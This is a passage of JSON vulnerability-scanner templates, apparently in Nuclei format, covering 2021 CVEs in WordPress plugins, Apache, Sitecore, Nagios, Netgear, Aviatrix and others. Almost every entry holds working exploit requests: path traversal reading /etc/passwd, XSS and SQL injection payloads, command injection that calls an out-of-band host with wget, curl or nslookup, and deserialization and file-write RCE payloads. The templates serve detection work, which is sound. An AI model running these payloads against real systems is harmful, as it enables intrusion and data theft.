Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-HashMap>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n            <map-Value>\n              <std-String value=\"STDSTRING\"/>\n            </map-Value>\n          </map-Entry>\n        </map-HashMap>\n     </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24791","info":{"name":"Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2,\"Add New Snippet\")"],"condition":"and"}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["OpenID Connect Generic Client"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24215","info":{"name":"Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")"],"condition":"and"}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"regex","negative":true,"part":"body","regex":["^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-38146","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/home/download"],"headers":{"Content-Type":"application/json"},"body":"{\n  \"SearchString\": \"C:/Windows/Win.ini\",\n  \"Msg\": \"\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","words":["[fonts]","[extensions]","[files]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: 